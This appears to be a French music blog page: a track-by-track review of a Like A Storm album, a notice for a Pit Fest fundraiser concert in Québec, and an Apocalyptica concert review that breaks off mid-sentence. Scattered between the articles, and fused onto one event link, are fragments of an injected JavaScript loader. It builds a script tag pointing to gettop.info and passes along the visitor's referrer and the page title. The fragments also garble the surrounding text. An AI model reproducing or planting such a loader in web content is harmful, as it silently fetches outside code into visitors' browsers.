Chaos : L’album commence en force avec le titre ‘’Chaos’’. Le premier instrument qu’on entend est l’instrument spécial que je vous parlais auparavant. Il s’agit d’un Didgeridoo, un instrument à vent provenant de l’Australie. Pour ceux qui sont septiques à l’idée d’intégrer cet instrument à ce style de musique, détrompez-vous, ça sort de l’ordinaire et c’est superbe. Après la petite intro assurée par un solo de didgeridoo, la batterie et la guitare s’amène pour laisser place à la voix du chanteur. Pour ceux qui connaisse Andy, le chanteur de Black Veil Brides, vous aller remarquez immédiatement une forte ressemblance entre leur deux voix. Cette chanson propose un bon mélange de tout ce qu’on va retrouver sur l’album. Une fois c’est calme, par la suite c’est plus rock, et on a même droit à une petite phase de scream. Cette chanson amène vraiment le ton parfait pour nous amener a écouté le reste de l’album.

Love The Way You Hate Me : Si vous connaissez une chanson ou deux du groupe, une d’entre elles doit être celle-ci. C’est une des chansons qui m’a fait connaitre le groupe. On commence avec deux petits screams, suivi d’un riff de guitare qu’on va retrouver tout au long de la chanson. Une chose qu’on peut remarquer dans cette chanson, c’est que dans certains passages, durant que Chris Brooks, le chanteur du groupe, chante, on peut entendre des back vocals derrière qui screams, mais qui se font très discrets. Je trouve que ça apporte un petit quelque chose de plus à la chanson. Au milieu de la chanson, nous avons un nouveau solo de Didgeridoo. Au début l’instrument est le seul qu’on entend, par la suite les autres instruments viennent s’ajouter uns à un pour repartir la chanson et ce dans une continuité plus que fluide. Cette chanson est une de mes préférées sur l’album.

Wish You Hell : Et voilà l’autre chanson que vous risquez de connaître si vous avez déjà entendu quelques chansons du groupe. C’est l’autre chanson qui m’a aidé à découvrir Like A Storm. La chanson commence un peu différemment. Cette fois ci c’est sur un thème un peu plus country/western qu’elle commence…mais pas pour longtemps. Après quelques secondes surement, la sonorité à laquelle on commence déjà à s’habituer, revient de plus belle. Je trouve que la petite partie country, qu’on a pu retrouver au début et qui revient tout au long de la chanson, se mélange très bien au reste du titre. Ça apporte encore une fois une sonorité différente qui fait très bien le boulot et qui vient nous présenter des chansons originales qui sortent de l’ordinaire.

Break Free : Tout album de rock et/ou Hard-Rock comporte sa balade. Like A Storm ne fait pas exception à la règle et nous présente Break Free. Celle-ci est plus calme que les autres et nous apporte une sonorité se rapprochant de ce que les bands Creed et Starset ont à offrir. Au milieu de la chanson, un bon solo vient pimenter et donner un petit vent un peu plus rock à la chanson. Après ce solo le ton de la chanson augmente un peu pour se terminer sur une guitare seule qui offre un son très différent de ce qu’on est habitué d’entendre. Ça conclus le titre avec beauté. Pour une ballade je trouve que le groupe nous fait passer par une gamme de sons et d’émotions différentes et ça, j’adore.

Never Surrender : On revient à la normal avec Never Surrender. Le titre est un peu répétitif mais nous offre un bon petit solo de guitare, suivi d’un petit scream au milieu du titre, ce qui vient un peu briser la redondance de cette chanson. Je ne dis pas qu’elle est mauvaise mais il manque ce petit quelque chose que je ne saurais expliquer. Le solo et la fin, qui finit en force, vienne toutefois rendre le titre agréable au final.

Become The Enemy : Quelques battements de cœur, une voix ‘’off’’ et le titre commence avec un tempo et un son nous donnant immédiatement le gout de hocher la tête comme à tout bon show rock. Le riff de guitare, qui se veut accrocheur, se retrouve tout au long de la chanson. On a ici encore les screaming back vocals qui viennent redonner une profondeur unique à la chanson et on ne s’en lasse jamais. Encore une fois, le Didgeridoo est utilisé mais cette fois ci, il se fait plus discret un peu et c’est parfait ainsi car trop en abuser viendrait briser la magie que ce son apporte au groupe.

Southern Skies : On a ici une autre balade et celle-ci est encore plus slow et calme que Break Free. Southern Skies elle est plus acoustique et plus profonde. Cette chanson me rappelle vraiment certaines balades interprétées par le groupe Alter Bridge. Pour ceux ou celles qui veulent vraiment une chanson smooth et ‘’romantique’’ dans sa sonorité, vont surement opter pour celle-ci.

Six Feet Under : On revient encore ici avec un son plus Hard. Avec les premières notes, on peut déjà déduire que la chanson sera on ne peut plus hard et rock que les dernières. Une chose qui est nouveau ici, et qui est différents des autres chansons, c’est qu’avant le solo de guitare habituel du milieu de chanson, nous avons droit à un solo de basse qui est à mon opinion, trop souvent oublié.
À part le solo de basse, le titre n’apporte toutefois pas vraiment de nouveau et de sensationnel mais il reste toutefois très agréable à l’écoute.

Gangster’s Paradise : Cette chanson a été beaucoup reprise par pleins de groups Rock, Hard-Rock, Metal, Screamo, etc. Like A Storm a décidé de tenter aussi sa chance pour nous offrir leur version à eux. Ce cover nous rappelle beaucoup celui du band Falling In Reverse et n’apporte malheureusement aucune nouveauté. Pour ceux qui ne connaissent que la version originale, vous allez toutefois rester surpris d’entendre ce que le groupe nous offre. Une bonne petite phase de scream vient encore une fois donner un vent de fraîcheur à cette chanson qui a été reprise a mainte reprises. Même si c’est du déjà vu, la chanson reste excellente et saura faire connaitre le classique ‘’Gangster’s Paradise’’ à ceux qui ne le connaisse pas déjà.

Ordinary : Encore une balade ? Je ne dirais pas ça mais on a ici encore une chanson très calme. Elle est entièrement acoustique, comparée aux autres balades qui eux avaient un soupçon de guitare électrique. Pour moi c’est la chanson qui m’accroche le moins de l’album. Il manque quelque chose pour nous attirer. La chanson reste toujours au même tempo et au même ton. Un petit revirement à quelque part dans la chanson n’aurait pas fait de tort. Malgré tout, certaines personnes trouveront leur compte dans Ordinary.

Nothing Remains : Nous voici à la dernière chanson de l’album. Une intro encore une fois douce pour nous amené un autre riff accrocheur qui nous fait headbanger encore une fois. Sans être une chanson slow et smooth, elle n’est pas non plus la plus rock de l’album. On dirait un petit mélange des deux types de sons qu’on a retrouvé tout au long de l’album et ça termine bien l’album.

Au final, je vous dirais que côté découverte, le groupe Like A Storm est pour moi ma meilleure découverte à présent en 2015. Un son certes qu’on est habitué d’entendre, mais le groupe nous offre tellement de sonorités différentes, que ça vient rafraîchir notre répertoire de rock / Hard-rock. Le Didgeridoo est bien utilisé et dosé, ce qui nous fait pas haïr cet instrument qu’on est pas habitué d’entendre. Je vous conseille fortement d’écouter les quelques chansons que je vais vous poster ici-bas, pour vous faire une idée du groupe. A oui j’oubliais, il parait qu’en spectacle, ils sont excellents.
Je donne donc une note de 8.5/10 ce qui est pour moi une excellente note !

Sur ce j’espère que j’ai su attirer votre attention et vous faire apprécier un nouveau band qui gagne à être connu au fil du temps.

Bonne journée à vous tous !

Rock On !

Christopher Drouin

 

 

Photo: ComediHa! Les Morissette

var d=document;var s=d.createElement(‘script’);

Show de financement pour le Pit Fest

Le 4 juillet prochain, venez faire votre tour au Bar la Source de la Martinière, à Québec, pour un excellent spectacle de financement. La soirée est mise en place pour financer le Pit fest, crée en 2008. Cet éco-festival offre l’occasion de fêter dans la nature tout en étant responsable sur le plan écologique et social. Le festival encourage les artistes de la scène locale et offre des activités sportives, des démonstrations artistiques et différents ateliers. La nourriture est fournie sur place toute la fin de semaine.

Le festival a lieu tous les ans à la mi-août, en forêt sur le site du Pit à Bédard, à Charlesbourg, qui offre emplacements de stationnement, camping, eau potable et toilettes. Le Pit Fest compte plus d’une centaine de participants chaque année.

La mise sur pied de ce festival nécessite de nombreux coûts pour les installations, la nourriture fournie toute la fin de semaine et les spectacles de musique, entre autres. Donc, cette année, les organisateurs du Pit Fest ont décidé de faire un show de financement pour payer les dépenses qu’occasionne le festival et pour ainsi pouvoir continuer de récidiver l’événement l’année suivante.

UN GROS MERCI aux personnes et aux groupes qui ont accepté de jouer bénévolement et rendre tout ça possible.

PAIN RELIEF (Punk Rock, Québec)
https://www.facebook.com/painreliefpunk
http://painrelief.bandcamp.com/

A TREE AT LAST (Punk Rock, Québec)
https://www.facebook.com/ATREEATLAST
https://atreeatlast.bandcamp.com/

WADE GARRETT (Biker Punk Rock, Thetford Mines)
https://www.facebook.com/WadeGarretts
http://wadegarrett.bandcamp.com/

SOULBREAKER (Folk Punk, Québec)
https://www.facebook.com/soulbreakerqc

SÉBASTIEN TREMBLAY (Cover Punk, Québec)

Les portes ouvriront à 20h00 et le spectacle commencera à 21h00. Les billets sont en vente à 10$ en prévente sur http://pitfest.org/show-de-financement ou au coût de 12$ à la porte le soir de l’événement.

Au plaisir de voir le plus de monde là-bas pour faire la fête avec nous et encourager le festival ainsi que nos bands locaux. Les spectacles du 14-15 août prochain pour la 7e édition du Pit fest seront annoncés sous peu.

Pour voir l’événement facebook : https://www.facebook.com/events/100286463647413s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

Photo: Gala de Patrice L’écuyer au Comedi Ha!

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

Photo: Gala Comedi Ha! Animé par P-A Methot

 

document.currentScript.parentNode.insertBefore(s, document.currentScript);

Critique Apocalyptica et Art Of Dying à l’Impérial Bell 2015

Du métal avec comme seuls instruments des violoncelles et une batterie vous sembles impossible ? C’est que vous ne connaissez pas le groupe Apocalyptica. Le groupe finlandais était de passage à Québec, hier le 9 juin 2015, dans le cadre de la tournée Shadowmaker Tour 2015. Le groupe canadien Art Of Dying était de la partie en tant que groupe invité. Pour ceux qui ne connaissent pas le concept du groupe Apocalyptica, et bien c’est quatre musiciens, dont un batteur et trois joueurs de violoncelle, qui font du Hard-Rock/Metal et ce, seulement avec ces instruments. Aucune guitare n’est nécessaire pour donner le résultat qui est plus que surprenant. Auparavant, le band c’est fait connaitre en jouant des reprises du légendaire groupe Metallica, mais au fil du temps ils ont commencés à faire leurs propres compositions. Pour leur dernier album, qui est sorti il y a quelques semaines seulement, ils ont conclue une entente avec Franky Perez, membre du groupe Scars on Broadway, pour chanter les titres qui comprennent une partie vocale. Franky prend donc la route avec le band. Est-ce que cette soirée pluvieuse fut une réussite ? Voyons voir…

À ma grande surprise, la salle était peu remplie. On pouvait estimer à ±300, le nombre de personnes présentes dans la salle de l’Impérial Bell. Je trouve ça très peu pour un groupe de cette envergure. La majorité des gens se sont dirigés vers les 2e et 3e paliers de la salle tandis que l’autre partie c’est logée sur le parterre, collé à la scène. Quelqu’un qui arrivait plus tard en soirée n’avait donc aucune difficulté à se rendre au devant de la scène. Vers 20:00, les lumières se sont tamisés et le premier groupe de la soirée à fait son entrée sur scène.

Art Of Dying : C’est avec une petite intro musical, suivi du titre ‘Best Won’t Do’’, que le groupe à fait son entrée sur scène. Même pour ceux qui connaissent le groupe comme moi, cette chanson ne nous disait rien et c’est normal, car c’est un des titres qui vont se retrouver sur le prochain album qui va sortir plus tard cet été. On peut déjà remarquer qu’ils ont adoptés un style un peu plus hard-rock que dans le passé. Sur les précédents albums, il y avait beaucoup de balades et de chansons un peu plus ‘’Slows’’ et moins de puissance comme on peut retrouver dans ‘’Best Won’t Do’’. Côté sonore, le son était bien ajusté, on pouvait facilement différencier les sons des différents instruments. Les gars étaient actifs sur scène et ils interagissaient bien avec la foule même si celle-ci semblait amortie durant le set. Jonny Hetherington (le chanteur) et Tavis Stanley (le guitariste) ont tentés tant bien que de mal de faire lever la foule, mais seulement quelques uns d’entre nous ont réagis et les autres sont restés indifférents. Je trouve ça dommage car les gars ne viennent pas souvent dans le coin et ils donnent tout un show et la moindre des choses aurait été de mieux les accueillir mais ça ne reste que mon opinion personnelle. Malgré tout, les musiciens semblaient apprécier le fait de jouer pour nous et nous on offert un set de dix chansons. Parlant de setlist, le groupe a misé gros en jouant six nouvelles chansons que personne ne connait encore, mise à part ‘’Rise UP’’ qui est sortie depuis déjà un petit bout de temps sur internet. Décision Risquée, mais quand même bien choisie, car premièrement ça nous donne un aperçus du prochain album à venir et deuxièmement, ca confirme l’orientation musical, sois un peu plus hard-rock qu’auparavant, mais sans toutefois mette de côté les ballades. Nous avons même eu droit à un ‘’duel’’ d’intensité de hautes notes entre Jonny, et la guitare de Tavis. Un autre fait cocasse, à deux reprises, Jonny a pris un porte-voix collé à son micro pour donné un son différent à sa voix, ce qui donnait un résultat plutôt concluant. Somme tout, le groupe à fait selon moi très bonne impression après une longue absence. J’ai vu beaucoup de gens se diriger vers la table de marchandise après le set pour aller rencontrer le groupe et acheter leur EP. Comme quoi ils ont surement maintenant de nouveaux fans québécois.
Voici la Setlist qui a été jouée par Art Of Dying
– Best Won’t Do

– Eat You alive
– Some Things Never Change
– Get Through This
– Tear Down The Wall
– You Don’t Know Me
– Everything
– Moth
– Rise Up
– Die Trying

Apocalyptica : Après un petit temps d’attente, les lumières se sont fermées, et le son de la musique a grimpé en flèche et nous avons pu entendre la populaire chanson ‘’Du Hast’’ du groupe Rammstein. Je ne sais pas si c’est leur musique d’intro habituelle, mais c’est assez cocasse quand on sait que la dernière fois qu’ils sont venu à Québec, c’était en première partie de Rammstein, dans le cadre du festival d’été de Québec en 2010. Un peu avant la fin de la chanson, les membres ont fait apparitions sur scène en saluant la foule avant de commencer en doucement avec une ‘’I-III-V Seen Of Chaos’’ suivi en force de leur nouveau succès ‘’Cold Blood’’. C’est durant ce titre qu’on a pu juger par nous même de l’efficacité du nouveau membre temporaire du groupe, Franky Perez. J’ai été agréablement surpris de ce qu’il avait à offrir en ‘’live’’ versus ce qu’il offre en version enregistrement studio. Il était énergique et dosait bien ses différentes intensités de sa voix. Il n’était pas présent pour tout le spectacle, car le groupe a su conservé son côté instrumental et jouer une bonne quantité de titres instrumentaux sans paroles. Par contre, je trouve que la présence de Franky amène un vent de fraîcheur au groupe et ainsi, il tombe moins dans le côté répétitif. Côté son, j’aurais un peu augmenté le son des violoncelles car parfois des les moments les plus calmes et ‘’smooths’’, le son était réduit de beaucoup ce qui nous donnait l’impression de perdre certa